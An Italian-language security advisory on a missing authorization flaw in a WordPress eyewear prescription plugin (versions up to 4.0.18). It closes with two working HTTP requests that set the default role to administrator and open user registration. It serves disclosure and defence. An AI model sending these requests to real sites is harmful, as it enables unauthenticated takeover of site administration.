
Eyewear prescription form <= 4.0.18 - Autorizzazione mancante per aggiornamento arbitrario delle opzioni senza autenticazione
Modulo per prescrizioni di occhiali <= 4.0.18 - Autorizzazione mancante che consente l'aggiornamento arbitrario delle opzioni senza autenticazione
Il plugin Eyewear prescription form per WordPress è vulnerabile a modifiche non autorizzate dei dati che possono portare a un'escalation dei privilegi a causa di un controllo delle capability mancante nella funzione adminSetting() in tutte le versioni fino alla 4.0.18 inclusa. Ciò consente a utenti non autenticati di aggiornare opzioni arbitrarie sul sito WordPress. Questa vulnerabilità può essere sfruttata per impostare il ruolo predefinito per la registrazione ad amministratore e abilitare la registrazione degli utenti, consentendo agli attaccanti di ottenere accesso amministrativo a un sito vulnerabile.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1